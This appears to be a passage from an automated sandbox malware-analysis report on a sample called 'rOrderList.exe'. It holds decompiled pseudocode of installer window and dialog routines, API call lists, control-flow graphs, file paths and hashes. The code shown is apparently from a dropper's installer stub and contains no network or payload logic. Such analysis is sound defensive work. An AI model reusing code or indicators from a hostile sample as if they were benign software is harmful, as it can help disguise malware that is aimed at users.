                                                                                      										}
                                                                                      										__eflags =  *0x42a30c - _t136;
                                                                                      										if( *0x42a30c == _t136) {
                                                                                      											_t102 = E0040140B(3);
                                                                                      											__eflags = _t102;
                                                                                      											if(_t102 != 0) {
                                                                                      												goto L26;
                                                                                      											}
                                                                                      											 *0x421f18 = 1;
                                                                                      											L21:
                                                                                      											_push(0x78);
                                                                                      											L22:
                                                                                      											E0040446B();
                                                                                      											goto L26;
                                                                                      										}
                                                                                      										E0040140B(_t130);
                                                                                      										 *0x421f18 = _t130;
                                                                                      										goto L21;
                                                                                      									}
                                                                                      									__eflags =  *0x40a39c - _t136; // 0x2
                                                                                      									if(__eflags <= 0) {
                                                                                      										goto L25;
                                                                                      									}
                                                                                      									_push(0xffffffff);
                                                                                      									goto L22;
                                                                                      								}
                                                                                      								_push(_t135);
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                                      							_t106 = IsWindowEnabled(_t129);
                                                                                      							__eflags = _t106;
                                                                                      							if(_t106 == 0) {
                                                                                      								goto L61;
                                                                                      							}
                                                                                      							goto L13;
                                                                                      						}
                                                                                      						SetWindowLongW(_t128, _t136, _t136);
                                                                                      						return 1;
                                                                                      					} else {
                                                                                      						DestroyWindow( *0x429238);
                                                                                      						 *0x429238 = _a12;
                                                                                      						L58:
                                                                                      						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
                                                                                      							ShowWindow(_t128, 0xa); // executed
                                                                                      							 *0x425748 = 1;
                                                                                      						}
                                                                                      						L61:
                                                                                      						return 0;
                                                                                      					}
                                                                                      				}
                                                                                      			}






























                                                                                      0x00403fc2
                                                                                      0x00403fcb
                                                                                      0x0040410c
                                                                                      0x00404110
                                                                                      0x00404114
                                                                                      0x00404116
                                                                                      0x0040411b
                                                                                      0x00404126
                                                                                      0x00404131
                                                                                      0x00404136
                                                                                      0x00404138
                                                                                      0x0040413a
                                                                                      0x0040413d
                                                                                      0x00404142
                                                                                      0x00404150
                                                                                      0x0040415d
                                                                                      0x00404164
                                                                                      0x00404164
                                                                                      0x00404165
                                                                                      0x00404165
                                                                                      0x0040416a
                                                                                      0x00404170
                                                                                      0x00404177
                                                                                      0x0040417d
                                                                                      0x0040417f
                                                                                      0x004041bf
                                                                                      0x004041c4
                                                                                      0x004041c9
                                                                                      0x004041c9
                                                                                      0x004041ce
                                                                                      0x004041d7
                                                                                      0x004041d9
                                                                                      0x004041de
                                                                                      0x004041e4
                                                                                      0x004041e8
                                                                                      0x004041e8
                                                                                      0x004041ed
                                                                                      0x004041f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041fe
                                                                                      0x00404204
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040420d
                                                                                      0x00404215
                                                                                      0x0040421a
                                                                                      0x0040421d
                                                                                      0x00404223
                                                                                      0x00404228
                                                                                      0x0040422b
                                                                                      0x00404231
                                                                                      0x00404236
                                                                                      0x00404239
                                                                                      0x0040423f
                                                                                      0x00404247
                                                                                      0x0040424d
                                                                                      0x00404253
                                                                                      0x00404257
                                                                                      0x0040425e
                                                                                      0x0040425e
                                                                                      0x0040425e
                                                                                      0x00404268
                                                                                      0x0040427a
                                                                                      0x00404286
                                                                                      0x0040428b
                                                                                      0x00404295
                                                                                      0x0040429b
                                                                                      0x0040429d
                                                                                      0x004042a2
                                                                                      0x0040429f
                                                                                      0x0040429f
                                                                                      0x0040429f
                                                                                      0x004042b2
                                                                                      0x004042ca
                                                                                      0x004042cc
                                                                                      0x004042d2
                                                                                      0x004042e7
                                                                                      0x004042d4
                                                                                      0x004042dd
                                                                                      0x004042df
                                                                                      0x004042df
                                                                                      0x004042ed
                                                                                      0x004042fe
                                                                                      0x00404314
                                                                                      0x0040431b
                                                                                      0x00404325
                                                                                      0x0040432a
                                                                                      0x0040432c
                                                                                      0x00000000
                                                                                      0x00404332
                                                                                      0x00404332
                                                                                      0x00404334
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040433a
                                                                                      0x0040433e
                                                                                      0x00404363
                                                                                      0x00404369
                                                                                      0x0040436f
                                                                                      0x00404371
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404397
                                                                                      0x0040439d
                                                                                      0x0040439f
                                                                                      0x004043a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004043aa
                                                                                      0x004043ad
                                                                                      0x004043b0
                                                                                      0x004043c7
                                                                                      0x004043d3
                                                                                      0x004043ec
                                                                                      0x004043f6
                                                                                      0x004043fb
                                                                                      0x00404401
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040440b
                                                                                      0x00404416
                                                                                      0x00000000
                                                                                      0x00404416
                                                                                      0x00404340
                                                                                      0x00404346
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040434c
                                                                                      0x00404352
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404358
                                                                                      0x0040432c
                                                                                      0x00404423
                                                                                      0x0040442f
                                                                                      0x00404436
                                                                                      0x00000000
                                                                                      0x00404181
                                                                                      0x00404181
                                                                                      0x00404184
                                                                                      0x004041b7
                                                                                      0x004041b7
                                                                                      0x004041b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041b9
                                                                                      0x0040418a
                                                                                      0x0040418f
                                                                                      0x00404191
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041a1
                                                                                      0x004041a9
                                                                                      0x00000000
                                                                                      0x004041af
                                                                                      0x00403fdd
                                                                                      0x00403fdd
                                                                                      0x00403fe1
                                                                                      0x00403fe6
                                                                                      0x00403ff5
                                                                                      0x00403ff5
                                                                                      0x00403ffe
                                                                                      0x00404007
                                                                                      0x00404012
                                                                                      0x00404012
                                                                                      0x0040401e
                                                                                      0x0040403a
                                                                                      0x0040403d
                                                                                      0x00404050
                                                                                      0x00404056
                                                                                      0x004040f9
                                                                                      0x00000000
                                                                                      0x00404102
                                                                                      0x0040405c
                                                                                      0x00404069
                                                                                      0x0040406b
                                                                                      0x0040406d
                                                                                      0x0040408c
                                                                                      0x0040408c
                                                                                      0x0040408f
                                                                                      0x00404094
                                                                                      0x00404097
                                                                                      0x004040a7
                                                                                      0x004040a8
                                                                                      0x004040aa
                                                                                      0x004040e0
                                                                                      0x004040f3
                                                                                      0x00000000
                                                                                      0x004040f3
                                                                                      0x004040ac
                                                                                      0x004040b2
                                                                                      0x004040cb
                                                                                      0x004040d0
                                                                                      0x004040d2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040d4
                                                                                      0x004040c0
                                                                                      0x004040c0
                                                                                      0x004040c2
                                                                                      0x004040c2
                                                                                      0x00000000
                                                                                      0x004040c2
                                                                                      0x004040b5
                                                                                      0x004040ba
                                                                                      0x00000000
                                                                                      0x004040ba
                                                                                      0x00404099
                                                                                      0x0040409f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040a1
                                                                                      0x00000000
                                                                                      0x004040a1
                                                                                      0x00404091
                                                                                      0x00000000
                                                                                      0x00404091
                                                                                      0x00404077
                                                                                      0x0040407e
                                                                                      0x00404084
                                                                                      0x00404086
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404086
                                                                                      0x00404042
                                                                                      0x00000000
                                                                                      0x00404020
                                                                                      0x00404026
                                                                                      0x00404030
                                                                                      0x0040443c
                                                                                      0x00404442
                                                                                      0x0040444f
                                                                                      0x00404455
                                                                                      0x00404455
                                                                                      0x0040445f
                                                                                      0x00000000
                                                                                      0x0040445f
                                                                                      0x0040401e

                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
                                                                                      • ShowWindow.USER32(?), ref: 00404012
                                                                                      • DestroyWindow.USER32 ref: 00404026
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404042
                                                                                      • GetDlgItem.USER32(?,?), ref: 00404063
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040407E
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 0040412C
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404136
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404247
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404268
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040427A
                                                                                      • EnableWindow.USER32(?,?), ref: 00404295
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
                                                                                      • EnableMenuItem.USER32(00000000), ref: 004042B2
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
                                                                                      • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
                                                                                      • SetWindowTextW.USER32(?,00423748), ref: 0040431B
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040444F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: H7B
                                                                                      • API String ID: 3282139019-2300413410
                                                                                      • Opcode ID: 7a4d7a2b6d88d2e979721611d93dcd82fba8a79b9e582fd56e137d420d9fb1a2
                                                                                      • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
                                                                                      • Opcode Fuzzy Hash: 7a4d7a2b6d88d2e979721611d93dcd82fba8a79b9e582fd56e137d420d9fb1a2
                                                                                      • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 293 403c0b-403c23 call 406931 296 403c25-403c30 GetUserDefaultUILanguage call 406483 293->296 297 403c37-403c6e call 40640a 293->297 300 403c35 296->300 303 403c70-403c81 call 40640a 297->303 304 403c86-403c8c lstrcatW 297->304 302 403c91-403cba call 403ee1 call 405f19 300->302 310 403cc0-403cc5 302->310 311 403d4c-403d54 call 405f19 302->311 303->304 304->302 310->311 312 403ccb-403cf3 call 40640a 310->312 317 403d62-403d87 LoadImageW 311->317 318 403d56-403d5d call 406579 311->318 312->311 319 403cf5-403cf9 312->319 321 403e08-403e10 call 40140b 317->321 322 403d89-403db9 RegisterClassW 317->322 318->317 323 403d0b-403d17 lstrlenW 319->323 324 403cfb-403d08 call 405e3e 319->324 333 403e12-403e15 321->333 334 403e1a-403e25 call 403ee1 321->334 325 403ed7 322->325 326 403dbf-403e03 SystemParametersInfoW CreateWindowExW 322->326 330 403d19-403d27 lstrcmpiW 323->330 331 403d3f-403d47 call 405e11 call 40653c 323->331 324->323 329 403ed9-403ee0 325->329 326->321 330->331 337 403d29-403d33 GetFileAttributesW 330->337 331->311 333->329 345 403e2b-403e45 ShowWindow call 4068c1 334->345 346 403eae-403eaf call 405677 334->346 340 403d35-403d37 337->340 341 403d39-403d3a call 405e5d 337->341 340->331 340->341 341->331 353 403e51-403e63 GetClassInfoW 345->353 354 403e47-403e4c call 4068c1 345->354 349 403eb4-403eb6 346->349 351 403ed0-403ed2 call 40140b 349->351 352 403eb8-403ebe 349->352 351->325 352->333 355 403ec4-403ecb call 40140b 352->355 358 403e65-403e75 GetClassInfoW RegisterClassW 353->358 359 403e7b-403e9e DialogBoxParamW call 40140b 353->359 354->353 355->333 358->359 363 403ea3-403eac call 403b5b 359->363 363->329
                                                                                      C-Code - Quality: 96%
                                                                                      			E00403C0B(void* __eflags) {
                                                                                      				intOrPtr _v4;
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void _v16;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t22;
                                                                                      				void* _t30;
                                                                                      				void* _t32;
                                                                                      				int _t33;
                                                                                      				void* _t36;
                                                                                      				int _t39;
                                                                                      				int _t40;
                                                                                      				int _t44;
                                                                                      				short _t63;
                                                                                      				WCHAR* _t65;
                                                                                      				signed char _t69;
                                                                                      				signed short _t73;
                                                                                      				WCHAR* _t76;
                                                                                      				intOrPtr _t82;
                                                                                      				WCHAR* _t87;
                                                                                      
                                                                                      				_t82 =  *0x42a274;
                                                                                      				_t22 = E00406931(2);
                                                                                      				_t90 = _t22;
                                                                                      				if(_t22 == 0) {
                                                                                      					_t76 = 0x423748;
                                                                                      					L"1033" = 0x30;
                                                                                      					 *0x437002 = 0x78;
                                                                                      					 *0x437004 = 0;
                                                                                      					E0040640A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                                      					__eflags =  *0x423748;
                                                                                      					if(__eflags == 0) {
                                                                                      						E0040640A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                                      					}
                                                                                      					lstrcatW(L"1033", _t76);
                                                                                      				} else {
                                                                                      					_t73 =  *_t22(); // executed
                                                                                      					E00406483(L"1033", _t73 & 0x0000ffff);
                                                                                      				}
                                                                                      				E00403EE1(_t78, _t90);
                                                                                      				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege";
                                                                                      				 *0x42a300 =  *0x42a27c & 0x00000020;
                                                                                      				 *0x42a31c = 0x10000;
                                                                                      				if(E00405F19(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege") != 0) {
                                                                                      					L16:
                                                                                      					if(E00405F19(_t98, _t86) == 0) {
                                                                                      						E00406579(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                                      					}
                                                                                      					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                      					 *0x429248 = _t30;
                                                                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                      						L21:
                                                                                      						if(E0040140B(0) == 0) {
                                                                                      							_t32 = E00403EE1(_t78, __eflags);
                                                                                      							__eflags =  *0x42a320;
                                                                                      							if( *0x42a320 != 0) {
                                                                                      								_t33 = E00405677(_t32, 0);
                                                                                      								__eflags = _t33;
                                                                                      								if(_t33 == 0) {
                                                                                      									E0040140B(1);
                                                                                      									goto L33;
                                                                                      								}
                                                                                      								__eflags =  *0x42922c;
                                                                                      								if( *0x42922c == 0) {
                                                                                      									E0040140B(2);
                                                                                      								}
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							ShowWindow( *0x423728, 5); // executed
                                                                                      							_t39 = E004068C1("RichEd20"); // executed
                                                                                      							__eflags = _t39;
                                                                                      							if(_t39 == 0) {
                                                                                      								E004068C1("RichEd32");
                                                                                      							}
                                                                                      							_t87 = L"RichEdit20W";
                                                                                      							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                                      							__eflags = _t40;
                                                                                      							if(_t40 == 0) {
                                                                                      								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                                      								 *0x429224 = _t87;
                                                                                      								RegisterClassW(0x429200);
                                                                                      							}
                                                                                      							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E00403FB9, 0); // executed
                                                                                      							E00403B5B(E0040140B(5), 1);
                                                                                      							return _t44;
                                                                                      						}
                                                                                      						L22:
                                                                                      						_t36 = 2;
                                                                                      						return _t36;
                                                                                      					} else {
                                                                                      						_t78 =  *0x42a260;
                                                                                      						 *0x429204 = E00401000;
                                                                                      						 *0x429210 =  *0x42a260;
                                                                                      						 *0x429214 = _t30;
                                                                                      						 *0x429224 = 0x40a3b4;
                                                                                      						if(RegisterClassW(0x429200) == 0) {
                                                                                      							L33:
                                                                                      							__eflags = 0;
                                                                                      							return 0;
                                                                                      						}
                                                                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                      						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                                      						goto L21;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t78 =  *(_t82 + 0x48);
                                                                                      					_t92 = _t78;
                                                                                      					if(_t78 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					_t76 = 0x428200;
                                                                                      					E0040640A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a2b8 + _t78 * 2,  *0x42a2b8 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                                      					_t63 =  *0x428200; // 0x3a
                                                                                      					if(_t63 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					if(_t63 == 0x22) {
                                                                                      						_t76 = 0x428202;
                                                                                      						 *((short*)(E00405E3E(0x428202, 0x22))) = 0;
                                                                                      					}
                                                                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                      						L15:
                                                                                      						E0040653C(_t86, E00405E11(_t76));
                                                                                      						goto L16;
                                                                                      					} else {
                                                                                      						_t69 = GetFileAttributesW(_t76);
                                                                                      						if(_t69 == 0xffffffff) {
                                                                                      							L14:
                                                                                      							E00405E5D(_t76);
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						_t98 = _t69 & 0x00000010;
                                                                                      						if((_t69 & 0x00000010) != 0) {
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      			}

























                                                                                      0x00403c11
                                                                                      0x00403c1a
                                                                                      0x00403c21
                                                                                      0x00403c23
                                                                                      0x00403c37
                                                                                      0x00403c49
                                                                                      0x00403c52
                                                                                      0x00403c5b
                                                                                      0x00403c62
                                                                                      0x00403c67
                                                                                      0x00403c6e
                                                                                      0x00403c81
                                                                                      0x00403c81
                                                                                      0x00403c8c
                                                                                      0x00403c25
                                                                                      0x00403c25
                                                                                      0x00403c30
                                                                                      0x00403c30
                                                                                      0x00403c91
                                                                                      0x00403c9b
                                                                                      0x00403ca4
                                                                                      0x00403ca9
                                                                                      0x00403cba
                                                                                      0x00403d4c
                                                                                      0x00403d54
                                                                                      0x00403d5d
                                                                                      0x00403d5d
                                                                                      0x00403d73
                                                                                      0x00403d79
                                                                                      0x00403d87
                                                                                      0x00403e08
                                                                                      0x00403e10
                                                                                      0x00403e1a
                                                                                      0x00403e1f
                                                                                      0x00403e25
                                                                                      0x00403eaf
                                                                                      0x00403eb4
                                                                                      0x00403eb6
                                                                                      0x00403ed2
                                                                                      0x00000000
                                                                                      0x00403ed2
                                                                                      0x00403eb8
                                                                                      0x00403ebe
                                                                                      0x00403ec6
                                                                                      0x00403ec6
                                                                                      0x00000000
                                                                                      0x00403ebe
                                                                                      0x00403e33
                                                                                      0x00403e3e
                                                                                      0x00403e43
                                                                                      0x00403e45
                                                                                      0x00403e4c
                                                                                      0x00403e4c
                                                                                      0x00403e57
                                                                                      0x00403e5f
                                                                                      0x00403e61
                                                                                      0x00403e63
                                                                                      0x00403e6c
                                                                                      0x00403e6f
                                                                                      0x00403e75
                                                                                      0x00403e75
                                                                                      0x00403e94
                                                                                      0x00403ea5
                                                                                      0x00000000
                                                                                      0x00403eaa
                                                                                      0x00403e12
                                                                                      0x00403e14
                                                                                      0x00000000
                                                                                      0x00403d89
                                                                                      0x00403d89
                                                                                      0x00403d95
                                                                                      0x00403d9f
                                                                                      0x00403da5
                                                                                      0x00403daa
                                                                                      0x00403db9
                                                                                      0x00403ed7
                                                                                      0x00403ed7
                                                                                      0x00000000
                                                                                      0x00403ed7
                                                                                      0x00403dc8
                                                                                      0x00403e03
                                                                                      0x00000000
                                                                                      0x00403e03
                                                                                      0x00403cc0
                                                                                      0x00403cc0
                                                                                      0x00403cc3
                                                                                      0x00403cc5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403cd3
                                                                                      0x00403ce5
                                                                                      0x00403cea
                                                                                      0x00403cf3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403cf9
                                                                                      0x00403cfb
                                                                                      0x00403d08
                                                                                      0x00403d08
                                                                                      0x00403d11
                                                                                      0x00403d17
                                                                                      0x00403d3f
                                                                                      0x00403d47
                                                                                      0x00000000
                                                                                      0x00403d29
                                                                                      0x00403d2a
                                                                                      0x00403d33
                                                                                      0x00403d39
                                                                                      0x00403d3a
                                                                                      0x00000000
                                                                                      0x00403d3a
                                                                                      0x00403d35
                                                                                      0x00403d37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403d37
                                                                                      0x00403d17

                                                                                      APIs
                                                                                        • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                                                        • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,77253420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rOrderList.exe",00000000), ref: 00403C25
                                                                                        • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                                                                                      • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
                                                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Interpartesforhold\Strengelege,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,77253420), ref: 00403D0C
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Interpartesforhold\Strengelege,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
                                                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D2A
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Interpartesforhold\Strengelege), ref: 00403D73
                                                                                      • RegisterClassW.USER32(00429200), ref: 00403DB0
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC8
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DFD
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403E33
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403E5F
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403E6C
                                                                                      • RegisterClassW.USER32(00429200), ref: 00403E75
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403FB9,00000000), ref: 00403E94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\rOrderList.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Interpartesforhold\Strengelege$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 606308-774472566
                                                                                      • Opcode ID: 0b307520ca641d360a5c45cfd9714c8488050a479035ecdb86cfe50baa20a0e6
                                                                                      • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
                                                                                      • Opcode Fuzzy Hash: 0b307520ca641d360a5c45cfd9714c8488050a479035ecdb86cfe50baa20a0e6
                                                                                      • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 366 403068-4030b6 GetTickCount GetModuleFileNameW call 406032 369 4030c2-4030f0 call 40653c call 405e5d call 40653c GetFileSize 366->369 370 4030b8-4030bd 366->370 378 4030f6 369->378 379 4031db-4031e9 call 402fc6 369->379 371 403302-403306 370->371 381 4030fb-403112 378->381 385 4032ba-4032bf 379->385 386 4031ef-4031f2 379->386 383 403114 381->383 384 403116-40311f call 40357a 381->384 383->384 393 403125-40312c 384->393 394 403276-40327e call 402fc6 384->394 385->371 388 4031f4-40320c call 403590 call 40357a 386->388 389 40321e-40326a GlobalAlloc call 406a8c call 406061 CreateFileW 386->389 388->385 417 403212-403218 388->417 415 403280-4032b0 call 403590 call 403309 389->415 416 40326c-403271 389->416 398 4031a8-4031ac 393->398 399 40312e-403142 call 405fed 393->399 394->385 404 4031b6-4031bc 398->404 405 4031ae-4031b5 call 402fc6 398->405 399->404 413 403144-40314b 399->413 406 4031cb-4031d3 404->406 407 4031be-4031c8 call 406a1e 404->407 405->404 406->381 414 4031d9 406->414 407->406 413->404 420 40314d-403154 413->420 414->379 427 4032b5-4032b8 415->427 416->371 417->385 417->389 420->404 422 403156-40315d 420->422 422->404 424 40315f-403166 422->424 424->404 426 403168-403188 424->426 426->385 428 40318e-403192 426->428 427->385 429 4032c1-4032d2 427->429 430 403194-403198 428->430 431 40319a-4031a2 428->431 432 4032d4 429->432 433 4032da-4032df 429->433 430->414 430->431 431->404 435 4031a4-4031a6 431->435 432->433 434 4032e0-4032e6 433->434 434->434 436 4032e8-403300 call 405fed 434->436 435->404 436->371
                                                                                      C-Code - Quality: 99%
                                                                                      			E00403068(void* __eflags, signed int _a4) {
                                                                                      				DWORD* _v8;
                                                                                      				DWORD* _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				long _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				signed int _v40;
                                                                                      				short _v560;
                                                                                      				signed int _t54;
                                                                                      				void* _t57;
                                                                                      				void* _t62;
                                                                                      				intOrPtr _t65;
